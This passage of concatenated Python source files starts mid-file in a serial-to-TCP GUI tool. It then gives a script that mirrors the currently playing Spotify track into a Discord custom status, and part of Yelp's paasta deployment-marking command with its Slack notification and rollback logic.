str(self.ui.oEntryPort.text())], stdout=PIPE, stdin=PIPE)
self.oQueue = Queue()
self.oThread = Thread(target=self.enqueue_output, args=(self.oProcess.stdout, self.oQueue))
self.oThread.daemon = True
self.oThread.start()
# read line without blocking
while True:
try:
# line = q.get_nowait()
line = self.oQueue.get(timeout=.2)
o_check_normal = re.search('Started TCP', line)
print(str(line).replace('\n', ''))
if o_check_normal:
self.bNormalConnect = True
except Empty:
break
if not self.bNormalConnect:
self.startStopBind()
def closeAll(self):
self.oProcess.send_signal(signal.CTRL_C_EVENT)
exit()
def updateComList(self):
self.ui.oListBoxCom.clear()
l_ports = serial.tools.list_ports.comports()
connected = [element.device for element in l_ports]
self.ui.oListBoxCom.addItems(connected)
@staticmethod
def about():
o_msg_box = QMessageBox()
o_msg_box.setWindowTitle("TCP/IP Serial Binding Tool")
o_msg_box.setText("<p>Designer: Brfo</p>"
"<p>Contact: brian.fong@qorvo.com</p>"
"<p>Date: 2021</p>")
o_msg_box.exec_()
if __name__ == "__main__":
app = QApplication(sys.argv)
win = Window()
win.show()
sys.exit(app.exec_())
|
signpeaker.py
|
from urllib.parse import urlencode
import threading
import traceback
import responder
import requests
import livejson
import datetime
import base64
import pytz
import time
SETTINGS = livejson.File("settings.json")
if "host" not in SETTINGS:
SETTINGS["host"] = "0.0.0.0"
if "port" not in SETTINGS:
SETTINGS["port"] = 5768
if "ssl" not in SETTINGS:
SETTINGS["ssl"] = False
if "ssl_cert" not in SETTINGS:
SETTINGS["ssl_cert"] = None
if "ssl_key" not in SETTINGS:
SETTINGS["ssl_key"] = None
if "client_id" not in SETTINGS:
SETTINGS["client_id"] = None
if "client_secret" not in SETTINGS:
SETTINGS["client_secret"] = None
if "redirect_uri" not in SETTINGS:
SETTINGS["redirect_uri"] = None
if "discord_token" not in SETTINGS:
SETTINGS["discord_token"] = None
if "status_message" not in SETTINGS:
SETTINGS["status_message"] = "[ARTISTS] - [TRACK_TITLE]"
if "max_artists" not in SETTINGS:
SETTINGS["max_artists"] = 0
if "emoji_id" not in SETTINGS:
SETTINGS["emoji_id"] = None
if "emoji_name" not in SETTINGS:
SETTINGS["emoji_name"] = "Spotify"
if "fetch_delay" not in SETTINGS:
SETTINGS["fetch_delay"] = 5
if "clear_status_after" not in SETTINGS:
SETTINGS["clear_status_after"] = 0
if "timezone" not in SETTINGS:
SETTINGS["timezone"] = "UTC"
if "access_token" not in SETTINGS:
SETTINGS["access_token"] = None
if "refresh_token" not in SETTINGS:
SETTINGS["refresh_token"] = None
api = responder.API()
allow_spotify_login = False
def _log_message(message):
print("[{0}]{1}".format(str(datetime.datetime.now(pytz.timezone(SETTINGS["timezone"]))).split(".", 1)[0], message))
def logInfo(message):
_log_message("[INFO] " + message)
def logWarning(message):
_log_message("[WARNING] " + message)
def logError(message):
_log_message("[ERROR] " + message)
def requestLogin():
logInfo("Please log in on https://accounts.spotify.com/authorize?" + urlencode({
"response_type": "code",
"client_id": SETTINGS["client_id"],
"scope": "user-read-currently-playing",
"redirect_uri": SETTINGS["redirect_uri"]
}))
def onRateLimited():
logWarning("Spotify API rate limited. You may need to increase fetch_delay")
def updateDiscordSettings(jsonData):
return requests.patch("https://discord.com/api/v8/users/@me/settings", headers={
"Authorization": SETTINGS["discord_token"]
}, json=jsonData)
def getTokens(token, grant_type="authorization_code"):
grant_type = grant_type.lower()
assert grant_type.lower() in ["authorization_code", "refresh_token"], "Invalid grant_type"
data = {
"grant_type": grant_type
}
if grant_type == "authorization_code":
data["code"] = token
data["redirect_uri"] = SETTINGS["redirect_uri"]
else:
data["refresh_token"] = token
return requests.post("https://accounts.spotify.com/api/token", headers={
"Authorization": "Basic " + base64.b64encode("{0}:{1}".format(SETTINGS["client_id"], SETTINGS["client_secret"]).encode()).decode()
}, data=data)
@api.route("/")
def spotifyUserLogin(req, rresp):
global SETTINGS
global allow_spotify_login
rresp.status_code = 200
rresp.text = ""
if allow_spotify_login:
if "code" in req.params:
rresp.status_code = 500
rresp.text = "Internal server error, check console log"
if SETTINGS["client_id"]:
if SETTINGS["client_secret"]:
if SETTINGS["redirect_uri"]:
try:
jsonResp = getTokens(req.params["code"]).json()
if "error" not in jsonResp:
if "user-read-currently-playing" in jsonResp["scope"]:
allow_spotify_login = False
SETTINGS["access_token"] = jsonResp["access_token"]
SETTINGS["refresh_token"] = jsonResp["refresh_token"]
jsonResp = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": "Bearer " + SETTINGS["access_token"]
}).json()
if "error" not in jsonResp:
logInfo("Spotify logged in as " + jsonResp["display_name"])
rresp.status_code = 200
rresp.text = "Log in success!"
else:
logError(jsonResp["error"]["message"])
else:
rresp.text = "Permission error, user-read-currently-playing is not in scope"
else:
logError(jsonResp["error_description"])
except Exception as e:
logError(str(e))
else:
logError("redirect_uri is not set")
else:
logError("client_secret is not set")
else:
logError("client_id is not set")
elif "error" in req.params:
rresp.status_code = 401
rresp.text = "Failed to authenticate"
else:
rresp.status_code = 400
rresp.text = "Invalid request"
else:
rresp.status_code = 403
rresp.text = "Spotify login is currently disabled"
def statusUpdater():
retry_delay = 5
crash_retry_delay = 3
while True:
try:
if SETTINGS["discord_token"]:
resp = requests.get("https://discord.com/api/v8/users/@me", headers={
"Authorization": SETTINGS["discord_token"]
})
if resp.status_code == 200:
discordUsername = resp.json()["username"]
logInfo("Discord logged in as " + discordUsername)
last_status_message = ""
while True:
try:
if SETTINGS["access_token"]:
spotifyResp = requests.get("https://api.spotify.com/v1/me/player/currently-playing", headers={
"Authorization": "Bearer " + SETTINGS["access_token"]
})
if spotifyResp.status_code in [200, 204]:
if spotifyResp.status_code == 200:
spotifyJsonResp = spotifyResp.json()
if spotifyJsonResp["item"] and spotifyJsonResp["is_playing"]:
artist_list = [artist["name"] for artist in spotifyJsonResp["item"]["artists"]]
track_title = spotifyJsonResp["item"]["name"]
main_artist = artist_list[0]
artists = ", ".join(artist_list[:SETTINGS["max_artists"] if SETTINGS["max_artists"] > 0 else None])
status_message = SETTINGS["status_message"].replace("[MAIN_ARTIST]", main_artist).replace("[ARTISTS]", artists).replace("[TRACK_TITLE]", track_title)
if status_message != last_status_message:
jsonData = {
"custom_status": {
"text": status_message
}
}
if SETTINGS["clear_status_after"] > 0:
jsonData["custom_status"]["expires_at"] = (datetime.datetime.utcnow() + datetime.timedelta(seconds=SETTINGS["clear_status_after"])).isoformat()[:-3] + "Z"
if SETTINGS["emoji_id"]:
jsonData["custom_status"]["emoji_id"] = SETTINGS["emoji_id"]
if SETTINGS["emoji_name"]:
jsonData["custom_status"]["emoji_name"] = SETTINGS["emoji_name"]
logInfo("Updating Discord status to: " + status_message)
discordResp = updateDiscordSettings(jsonData)
if discordResp.status_code == 200:
last_status_message = status_message
else:
break
time.sleep(SETTINGS["fetch_delay"])
continue
else:
if "" != last_status_message:
logInfo("Removing Discord status...")
discordResp = updateDiscordSettings({"custom_status": None})
if discordResp.status_code == 200:
last_status_message = ""
else:
break
time.sleep(SETTINGS["fetch_delay"])
continue
else:
if "" != last_status_message:
logInfo("Removing Discord status...")
discordResp = updateDiscordSettings({"custom_status": None})
if discordResp.status_code == 200:
last_status_message = ""
else:
break
time.sleep(retry_delay)
continue
elif resp.status_code == 429:
onRateLimited()
time.sleep(int(resp.headers["Retry-After"]))
continue
else:
try:
logError(spotifyResp.join()["error"]["message"])
except:
pass
time.sleep(retry_delay)
continue
else:
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
continue
else:
logError("Discord token is invalid")
time.sleep(retry_delay)
continue
else:
logError("discord_token is not set")
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
def statusUpdaterDaemon():
global SETTINGS
global allow_spotify_login
statusUpdaterStarted = False
retry_delay = 5
crash_retry_delay = 3
while True:
try:
if SETTINGS["client_id"]:
if SETTINGS["client_secret"]:
if SETTINGS["redirect_uri"]:
if SETTINGS["refresh_token"]:
logInfo("Refreshing Spotify token...")
resp = getTokens(SETTINGS["refresh_token"], grant_type="refresh_token")
if resp.status_code == 200:
jsonResp = resp.json()
SETTINGS["access_token"] = jsonResp["access_token"]
expires_in = jsonResp["expires_in"]
if not statusUpdaterStarted:
logInfo("Starting status updater...")
statusUpdaterThread = threading.Thread(target=statusUpdater)
statusUpdaterThread.daemon = True
statusUpdaterThread.start()
statusUpdaterStarted = True
time.sleep(expires_in - 60)
continue
elif resp.status_code == 429:
onRateLimited()
time.sleep(int(resp.headers["Retry-After"]))
continue
else:
SETTINGS["refresh_token"] = None
SETTINGS["access_token"] = None
allow_spotify_login = True
else:
allow_spotify_login = True
if allow_spotify_login:
requestLogin()
time.sleep(retry_delay)
continue
else:
logError("redirect_uri is not set")
time.sleep(retry_delay)
continue
else:
logError("client_secret is not set")
time.sleep(retry_delay)
continue
else:
logError("client_id is not set")
time.sleep(retry_delay)
continue
except Exception as e:
logError(str(e))
time.sleep(crash_retry_delay)
statusUpdaterDaemonThread = threading.Thread(target=statusUpdaterDaemon)
statusUpdaterDaemonThread.daemon = True
statusUpdaterDaemonThread.start()
ssl_certfile = None
ssl_keyfile = None
if SETTINGS["ssl"]:
ssl_certfile = SETTINGS["ssl_cert"]
ssl_keyfile = SETTINGS["ssl_key"]
api.run(address=SETTINGS["host"], port=SETTINGS["port"], ssl_certfile=ssl_certfile, ssl_keyfile=ssl_keyfile)
|
mark_for_deployment.py
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains methods used by the paasta client to mark a docker image for
deployment to a cluster.instance.
"""
import datetime
import getpass
import logging
import math
import os
import socket
import sys
import time
import traceback
from collections import defaultdict
from queue import Empty
from queue import Queue
from threading import Event
from threading import Thread
from typing import Collection
from typing import Dict
from typing import Iterator
from typing import Mapping
from typing import Optional
import humanize
import progressbar
from bravado.exception import HTTPError
from requests.exceptions import ConnectionError
from service_configuration_lib import read_deploy
from slackclient import SlackClient
from sticht import state_machine
from sticht.slo import SLOSlackDeploymentProcess
from paasta_tools import remote_git
from paasta_tools.api import client
from paasta_tools.cassandracluster_tools import CassandraClusterDeploymentConfig
from paasta_tools.cli.cmds.push_to_registry import is_docker_image_already_in_registry
from paasta_tools.cli.utils import get_jenkins_build_output_url
from paasta_tools.cli.utils import lazy_choices_completer
from paasta_tools.cli.utils import list_deploy_groups
from paasta_tools.cli.utils import trigger_deploys
from paasta_tools.cli.utils import validate_git_sha
from paasta_tools.cli.utils import validate_given_deploy_groups
from paasta_tools.cli.utils import validate_service_name
from paasta_tools.cli.utils import validate_short_git_sha
from paasta_tools.deployment_utils import get_currently_deployed_sha
from paasta_tools.kubernetes_tools import KubernetesDeploymentConfig
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.slack import get_slack_client
from paasta_tools.utils import _log
from paasta_tools.utils import _log_audit
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import format_tag
from paasta_tools.utils import get_git_url
from paasta_tools.utils import get_paasta_tag_from_deploy_group
from paasta_tools.utils import get_username
from paasta_tools.utils import ldap_user_search
from paasta_tools.utils import list_services
from paasta_tools.utils import load_system_paasta_config
from paasta_tools.utils import PaastaColors
from paasta_tools.utils import RollbackTypes
from paasta_tools.utils import TimeoutError
DEFAULT_DEPLOYMENT_TIMEOUT = 3600 # seconds
DEFAULT_AUTO_CERTIFY_DELAY = 600 # seconds
DEFAULT_SLACK_CHANNEL = "#deploy"
log = logging.getLogger(__name__)
def add_subparser(subparsers):
list_parser = subparsers.add_parser(
"mark-for-deployment",
help="Mark a docker image for deployment in git",
description=(
"'paasta mark-for-deployment' uses Git as the control-plane, to "
"signal to other PaaSTA components that a particular docker image "
"is ready to be deployed."
),
epilog=(
"Note: Access and credentials to the Git repo of a service are required "
"for this command to work."
),
)
list_parser.add_argument(
"-u",
"--git-url",
help=(
"Git url for service -- where magic mark-for-deployment tags are pushed. "
"Defaults to the normal git URL for the service."
),
default=None,
)
list_parser.add_argument(
"-c",
"-k",
"--commit",
help="Git sha to mark for deployment",
required=True,
type=validate_short_git_sha,
)
list_parser.add_argument(
"-l",
"--deploy-group",
"--clusterinstance",
help="Mark the service ready for deployment in this deploy group (e.g. "
"cluster1.canary, cluster2.main). --clusterinstance is deprecated and "
"should be replaced with --deploy-group",
required=True,
).completer = lazy_choices_completer(list_deploy_groups)
list_parser.add_argument(
"-s",
"--service",
help="Name of the service which you wish to mark for deployment. Leading "
'"services-" will be stripped.',
required=True,
).completer = lazy_choices_completer(list_services)
list_parser.add_argument(
"--verify-image-exists",
help="Check the docker registry and verify the image has been pushed",
dest="verify_image",
action="store_true",
default=False,
)
list_parser.add_argument(
"--wait-for-deployment",
help="Set to poll paasta and wait for the deployment to finish, "
"the default strategy is to mark for deployment and exit straightaway",
dest="block",
action="store_true",
default=False,
)
list_parser.add_argument(
"-t",
"--timeout",
dest="timeout",
type=int,
default=DEFAULT_DEPLOYMENT_TIMEOUT,
help=(
"Time in seconds to wait for paasta to deploy the service. "
"If the timeout is exceeded we return 1. "
"Default is %(default)s seconds."
),
)
list_parser.add_argument(
"--auto-rollback",
help="Automatically roll back to the previously deployed sha if the deployment "
"times out or is canceled (ctrl-c). Only applicable with --wait-for-deployment. "
"Defaults to false.",
dest="auto_rollback",
action="store_true",
default=False,
)
list_parser.add_argument(
"-d",
"--soa-dir",
dest="soa_dir",
metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
list_parser.add_argument(
"-v",
"--verbose",
action="count",
dest="verbose",
default=0,
help="Print out more output.",
)
list_parser.add_argument(
"--auto-certify-delay",
dest="auto_certify_delay",
type=int,
default=None, # the logic for this is complicated. See MarkForDeploymentProcess.get_auto_certify_delay.
help="After a deploy finishes, wait this many seconds before automatically certifying."
f"Default {DEFAULT_AUTO_CERTIFY_DELAY} when --auto-rollback is enabled",
)
list_parser.add_argument(
"--auto-abandon-delay",
dest="auto_abandon_delay",
type=int,
default=600,
help="After a rollback finishes, wait this many seconds before automatically abandoning.",
)
list_parser.add_argument(
"--auto-rollback-delay",
dest="auto_rollback_delay",
type=int,
default=30,
help="After noticing an SLO failure, wait this many seconds before automatically rolling back.",
)
list_parser.add_argument(
"--author",
dest="authors",
default=None,
action="append",
help="Additional author(s) of the deploy, who will be pinged in Slack",
)
list_parser.set_defaults(command=paasta_mark_for_deployment)
def mark_for_deployment(git_url, deploy_group, service, commit):
"""Mark a docker image for deployment"""
tag = get_paasta_tag_from_deploy_group(
identifier=deploy_group, desired_state="deploy"
)
remote_tag = format_tag(tag)
ref_mutator = remote_git.make_force_push_mutate_refs_func(
targets=[remote_tag], sha=commit
)
max_attempts = 3
for attempt in range(1, max_attempts + 1):
try:
remote_git.create_remote_refs(
git_url=git_url, ref_mutator=ref_mutator, force=True
)
if "yelpcorp.com" in git_url:
trigger_deploys(service)
except Exception as e:
logline = f"Failed to mark {commit} for deployment in deploy group {deploy_group}! (attempt \
{attempt}/{max_attempts}, error: {e}) \n Have you pushed your commit?"
_log(service=service, line=logline, component="deploy", level="event")
time.sleep(5 * attempt)
else:
logline = f"Marked {commit} for deployment in deploy group {deploy_group}"
_log(service=service, line=logline, component="deploy", level="event")
audit_action_details = {"deploy_group": deploy_group, "commit": commit}
_log_audit(
action="mark-for-deployment",
action_details=audit_action_details,
service=service,
)
return 0
return 1
def deploy_authz_check(deploy_info, service):
deploy_username = get_username()
system_paasta_config = load_system_paasta_config()
allowed_groups = (
deploy_info["allowed_push_groups"]
if deploy_info.get("allowed_push_groups") is not None
else system_paasta_config.get_default_push_groups()
)
if allowed_groups is not None:
search_base = system_paasta_config.get_ldap_search_base()
search_ou = system_paasta_config.get_ldap_search_ou()
host = system_paasta_config.get_ldap_host()
ldap_username = system_paasta_config.get_ldap_reader_username()
ldap_password = system_paasta_config.get_ldap_reader_password()
if not any(
[
deploy_username
in ldap_user_search(
group, search_base, search_ou, host, ldap_username, ldap_password
)
for group in allowed_groups
]
):
logline = f"current user is not authorized to perform this action (should be in one of {allowed_groups})"
_log(service=service, line=logline, component="deploy", level="event")
print(logline, file=sys.stderr)
sys.exit(1)
def report_waiting_aborted(service, deploy_group):
print(
PaastaColors.red(
"Waiting for deployment aborted."
" PaaSTA will continue trying to deploy this code."
)
)
print("If you wish to see the status, run:")
print()
print(f" paasta status -s {service} -l {deploy_group} -v")
print()
def get_authors_to_be_notified(git_url, from_sha, to_sha, authors):
if from_sha is None:
return ""
if authors:
authors_to_notify = authors
elif "git.yelpcorp.com" in git_url:
ret, git_authors = remote_git.get_authors(
git_url=git_url, from_sha=from_sha, to_sha=to_sha
)
if ret == 0:
authors_to_notify = git_authors.split()
else:
return f"(Could not get authors: {git_authors})"
else:
# We have no way of getting authors on the fly if the repository is not on gitolite
return ""
slacky_authors = ", ".join({f"<@{a}>" for a in authors_to_notify})
log.debug(f"Authors: {slacky_authors}")
return f"^ {slacky_authors}"
def deploy_group_is_set_to_notify(deploy_info, deploy_group, notify_type):
for step in deploy_info.get("pipeline", []):
if step.get("step", "") == deploy_group:
# Use the specific notify_type if available else use slack_notify
return step.get(notify_type, step.get("slack_notify", False))
return False
def get_deploy_info(service, soa_dir):
file_path = os.path.join(soa_dir, service, "deploy.yaml")
return read_deploy(file_path)
def print_rollback_cmd(old_git_sha, commit, auto_rollback, service, deploy_group):
if old_git_sha is not None and old_git_sha != commit and not auto_rollback:
print()
print("If you wish to roll back, you can run:")
print()
print(
PaastaColors.bold(
" paasta rollback --service {} --deploy-group {} --commit {} ".format(
service, deploy_group, old_git_sha
)
)
)
def paasta_mark_for_deployment(args):
"""Wrapping mark_for_deployment"""
if args.verbose:
log.setLevel(level=logging.DEBUG)
else:
log.setLevel(level=logging.INFO)
service = args.service
if service and service.startswith("services-"):
service = service.split("services-", 1)[1]
validate_service_name(service, soa_dir=args.soa_dir)
deploy_group = args.deploy_group
in_use_deploy_groups = list_deploy_groups(service=service, soa_dir=args.soa_dir)
_, invalid_deploy_groups = validate_given_deploy_groups(
in_use_deploy_groups, [deploy_group]
)
if len(invalid_deploy_groups) == 1:
print(
PaastaColors.red(
"ERROR: These deploy groups are not currently used anywhere: %s.\n"
% (",").join(invalid_deploy_groups)
)
)
print(
PaastaColors.red(
"This isn't technically wrong because you can mark-for-deployment before deploying there"
)
)
print(
PaastaColors.red(
"but this is probably a typo. Did you mean one of these in-use deploy groups?:"
)
)
print(PaastaColors.red(" %s" % (",").join(in_use_deploy_groups)))
print()
print(PaastaColors.red("Continuing regardless..."))
if args.git_url is None:
args.git_url = get_git_url(service=service, soa_dir=args.soa_dir)
commit = validate_git_sha(sha=args.commit, git_url=args.git_url)
old_git_sha = get_currently_deployed_sha(service=service, deploy_group=deploy_group)
if old_git_sha == commit:
print(
"Warning: The sha asked to be deployed already matches what is set to be deployed:"
)
print(old_git_sha)
print("Continuing anyway.")
if args.verify_image:
if not is_docker_image_already_in_registry(service, args.soa_dir, commit):
raise ValueError(
"Failed to find image in the registry for the following sha %s" % commit
)
deploy_info = get_deploy_info(service=service, soa_dir=args.soa_dir)
deploy_authz_check(deploy_info, service)
deploy_process = MarkForDeploymentProcess(
service=service,
deploy_info=deploy_info,
deploy_group=deploy_group,
commit=commit,
old_git_sha=old_git_sha,
git_url=args.git_url,
auto_rollback=args.auto_rollback,
block=args.block,
soa_dir=args.soa_dir,
timeout=args.timeout,
auto_certify_delay=args.auto_certify_delay,
auto_abandon_delay=args.auto_abandon_delay,
auto_rollback_delay=args.auto_rollback_delay,
authors=args.authors,
)
ret = deploy_process.run()
return ret
class Progress:
def __init__(self, percent=0, waiting_on=None, eta=None):
self.percent = percent
self.waiting_on = waiting_on
def human_readable(self, summary: bool):
if self.percent != 0 and self.percent != 100 and not summary:
s = f"{round(self.percent)}% (Waiting on {self.human_waiting_on()})"
else:
s = f"{round(self.percent)}%"
return s
def human_waiting_on(self):
if self.waiting_on is None:
return "N/A"
things = []
for cluster, queue in self.waiting_on.items():
queue_length = len(queue)
if queue_length == 0:
continue
elif queue_length == 1:
things.append(f"`{cluster}`: `{queue[0].get_instance()}`")
else:
things.append(f"`{cluster}`: {len(queue)} instances")
return ", ".join(things)
class MarkForDeploymentProcess(SLOSlackDeploymentProcess):
rollback_states = ["start_rollback", "rolling_back", "rolled_back"]
rollforward_states = ["start_deploy", "deploying", "deployed"]
default_slack_channel = DEFAULT_SLACK_CHANNEL
def __init__(
self,
service,
deploy_info,
deploy_group,
commit,
old_git_sha,
git_url,
auto_rollback,
block,
soa_dir,
timeout,
auto_certify_delay,
auto_abandon_delay,
auto_rollback_delay,
authors=None,
):
self.service = service
self.deploy_info = deploy_info
self.deploy_group = deploy_group
self.commit = commit
self.old_git_sha = old_git_sha
self.git_url = git_url
self.auto_rollback = (
auto_rollback and old_git_sha is not None and old_git_sha != commit
)
self.auto_rollbacks_ever_enabled = self.auto_rollback
self.block = block
self.soa_dir = soa_dir
self.timeout = timeout
self.mark_for_deployment_return_code = -1
self.auto_certify_delay = auto_certify_delay
self.auto_abandon_delay = auto_abandon_delay
self.auto_rollback_delay = auto_rollback_delay
self.authors = authors
# Separate green_light per commit, so that we can tell wait_for_deployment for one commit to shut down
# and quickly launch wait_for_deployment for another commit without causing a race condition.
self.wait_for_deployment_green_lights = defaultdict(Event)
self.human_readable_status = "Waiting on mark-for-deployment to initialize..."
self.progress = Progress()
self.last_action = None
self.slo_watchers = []
self.start_slo_watcher_threads(self.service, self.soa_dir)
# Initialize Slack threads and send the first message
super().__init__()
self.ping_authors()
self.print_who_is_running_this()
def get_progress(self, summary=False) -> str:
return self.progress.human_readable(summary)
def print_who_is_running_this(self):
build_url = get_jenkins_build_output_url()
if build_url is not None:
message = f"(<{build_url}|Jenkins Job>)"
else:
message = f"(Run by <@{getpass.getuser()}> on {socket.getfqdn()})"
self.update_slack_thread(message)
def get_authors(self) -> str:
# In order to avoid notifying people who aren't part of the current
# service push, we calculate authors based on commits different since
# the current production SHA, as opposed to the old SHA on this deploy
# group.
#
# This avoids situations such as:
# * Notifying people from a previous push which went through stagef,
# if the new push goes through stageg.
# * Notifying everybody who has committed to a repo in the past year
# when updating a "legacy" deploy group (e.g. for yelp-main).
prod_deploy_group = self.deploy_info.get("production_deploy_group")
from_sha = None
if prod_deploy_group is not None:
from_sha = get_currently_deployed_sha(
service=self.service, deploy_group=prod_deploy_group
)
# If there's no production deploy group, or the production deploy group
# has never been deployed to, just use the old SHA from this deploy group.
if from_sha is None:
from_sha = self.old_git_sha
return get_authors_to_be_notified(
git_url=self.git_url,
from_sha=from_sha,
to_sha=self.commit,
authors=self.authors,
)
def ping_authors(self, message: str = None) -> None:
if message:
self.update_slack_thread(f"{message}\n{self.get_authors()}")
else:
self.update_slack_thread(self.get_authors())
def get_slack_client(self) -> SlackClient:
return get_slack_client().sc
def get_slack_channel(self) -> str:
""" Safely get some slack channel to post to. Defaults to ``DEFAULT_SLACK_CHANNEL``.
Currently only uses the first slack channel available, and doesn't support
multi-channel notifications. """
if self.deploy_info.get("slack_notify", True):
try:
channel = self.deploy_info.get("slack_channels")[0]
# Nightly jenkins builds will often re-deploy master. This causes Slack noise that wasn't present before
# the auto-rollbacks work.
if self.commit == self.old_git_sha:
print(
f"Rollback SHA matches rollforward SHA: {self.commit}, "
f"Sending slack notifications to {DEFAULT_SLACK_CHANNEL} instead of {channel}."
)
return DEFAULT_SLACK_CHANNEL
else:
return channel
except (IndexError, AttributeError, TypeError):
return DEFAULT_SLACK_CHANNEL
else:
return DEFAULT_SLACK_CHANNEL
def get_deployment_name(self) -> str:
return f"Deploy of `{self.commit[:8]}` of `{self.service}` to `{self.deploy_group}`:"
def on_enter_start_deploy(self):
self.update_slack_status(
f"Marking `{self.commit[:8]}` for deployment for {self.deploy_group}..."
)
self.mark_for_deployment_return_code = mark_for_deployment(
git_url=self.git_url,
deploy_group=self.deploy_group,
service=self.service,
commit=self.commit,
)
if self.mark_for_deployment_return_code != 0:
self.trigger("mfd_failed")
else:
self.update_slack_thread(
f"Marked `{self.commit[:8]}` for {self.deploy_group}."
+ (
"\n" + self.get_authors()
if self.deploy_group_is_set_to_notify("notify_after_mark")
else ""
)
)
log.debug("triggering mfd_succeeded")
self.trigger("mfd_succeeded")
def schedule_paasta_status_reminder(self):
timeout_percentage_before_reminding = 75
def waiting_on_to_status(waiting_on):
if waiting_on is None:
return [
f"`paasta status --service {self.service} --{self.deploy_group}` -vv"
]
commands = []
for cluster, queue in waiting_on.items():
queue_length = len(queue)
if queue_length == 0:
continue
else:
instances = [q.get_instance() for q in queue]
commands.append(
f"`paasta status --service {self.service} --cluster {cluster} --instance {','.join(instances)} -vv`"
)
return commands
def times_up():
try:
if self.state == "deploying":
human_max_deploy_time = humanize.naturaldelta(
datetime.timedelta(seconds=self.timeout)
)
status_commands = "\n".join(
waiting_on_to_status(self.progress.waiting_on)
)
self.notify_users(
(
f"It has been {timeout_percentage_before_reminding}% of the maximum deploy time ({human_max_deploy_time}), "
"it probably should have finished by now. Is it stuck?\n\n"
"Try running this command to see the status of the deploy:\n"
f"{status_commands}"
)
)
except Exception as e:
log.error(
f"Non-fatal exception encountered when processing the status reminder: {e}"
)
def schedule_callback():
time_to_notify = self.timeout * (timeout_percentage_before_reminding / 100)
self.paasta_status_reminder_handle = self.event_loop.call_later(
time_to_notify, times_up
)
try:
self.event_loop.call_soon_threadsafe(schedule_callback)
except Exception as e:
log.error(
f"Non-fatal error encountered scheduling the status reminder callback: {e}"
)
def cancel_paasta_status_reminder(self):
try:
handle = self.get_paasta_status_reminder_handle()
if handle is not None:
handle.cancel()
self.paasta_status_reminder_handle = None
except Exception as e:
log.error(
f"Non-fatal error encountered when canceling the paasta status reminder: {e}"
)
def get_paasta_status_reminder_handle(self):
try:
return self.paasta_status_reminder_handle
except AttributeError:
return None
def states(self) -> Collection[str]:
return [
"_begin",
"start_deploy",
"deploying",
"deployed",
"mfd_failed",
"deploy_errored",
"deploy_cancelled",
"start_rollback",
"rolling_back",
"rolled_back",
"abandon",
"complete",
]
def start_state(self) -> str:
return "_begin"
def start_transition(self) -> str:
return "start_deploy"
def valid_transitions(self) -> Iterator[state_machine.TransitionDefinition]:
rollback_is_possible = (
self.old_git_sha is not None and self.old_git_sha != self.commit
)
yield {"source": "_begin", "dest": "start_deploy", "trigger": "start_deploy"}
yield {
"source": "start_deploy",
"dest": "deploying",
"trigger": "mfd_succeeded",
}
yield {"source": "deploying", "dest": "deployed", "trigger": "deploy_finished"}
yield {
"source": ["start_deploy", "start_rollback"],
"dest": "mfd_failed",
"trigger": "mfd_failed",
}
yield {
"source": [s for s in self.states() if not self.is_terminal_state(s)],
"dest": "deploy_errored",
"trigger": "deploy_errored",
}
yield {
"source": [s for s in self.states() if not self.is_terminal_state(s)],
"dest": "deploy_cancelled",
"trigger": "deploy_cancelled",
}
if rollback_is_possible:
yield {
"source": self.rollforward_states,
"dest": "start_rollback",
"trigger": "rollback_button_clicked",
"before": self.log_user_rollback,
}
yield {
"source": self.rollback_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "rollback_button_clicked",
}
yield {
"source": self.rollforward_states,
"dest": "start_rollback",
"trigger": "rollback_slo_failure",
"before": self.log_slo_rollback,
}
yield {
"source": self.rollback_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "rollback_slo_failure",
}
yield {
"source": self.rollback_states,
"dest": "start_deploy",
"trigger": "forward_button_clicked",
}
yield {
"source": self.rollforward_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "forward_button_clicked",
}
yield {
"source": "start_rollback",
"dest": "rolling_back",
"trigger": "mfd_succeeded",
}
yield {
"source": "rolling_back",
"dest": "rolled_back",
"trigger": "deploy_finished",
}
yield {
"source": "deployed",
"dest": "complete",
"trigger": "complete_button_clicked",
}
yield {"source": "deployed", "dest": "complete", "trigger": "auto_certify"}
yield {
"source": ["rolled_back", "rolling_back"],
"dest": "abandon",
"trigger": "abandon_button_clicked",
}
yield {"source": "rolled_back", "dest": "abandon", "trigger": "auto_abandon"}
if rollback_is_possible:
# Suppress these buttons if it doesn't make sense to roll back.
yield {
"source": "*",
"dest": None, # Don't actually change state, just call the before function.
"trigger": "enable_auto_rollbacks_button_clicked",
"unless": [self.auto_rollbacks_enabled],
"before": self.enable_auto_rollbacks,
}
yield {
"source": "*",
"dest": None, # Don't actually change state, just call the before function.
"trigger": "disable_auto_rollbacks_button_clicked",
"conditions": [self.any_slo_failing, self.auto_rollbacks_enabled],
"before": self.disable_auto_rollbacks,
}
yield {
"source": "*",
"dest": None,
"trigger": "slos_started_failing",
"conditions": [self.auto_rollbacks_enabled],
"unless": [self.already_rolling_back],
"before": self.start_auto_rollback_countdown,
}
yield {
"source": "*",
"dest": None,
"trigger": "slos_stopped_failing",
"before": self.cancel_auto_rollback_countdown,
}
yield {
"source": "*",
"dest": None,
"trigger": "snooze_button_clicked",
"before": self.restart_timer,
"conditions": [self.is_timer_running],
}
def disable_auto_rollbacks(self):
self.cancel_auto_rollback_countdown()
self.auto_rollback = False
self.update_slack_status(
f"Automatic rollback disabled for this deploy. To disable this permanently for this step, edit `deploy.yaml` and set `auto_rollback: false` for the `{self.deploy_group}` step."
)
def enable_auto_rollbacks(self):
self.auto_rollback = True
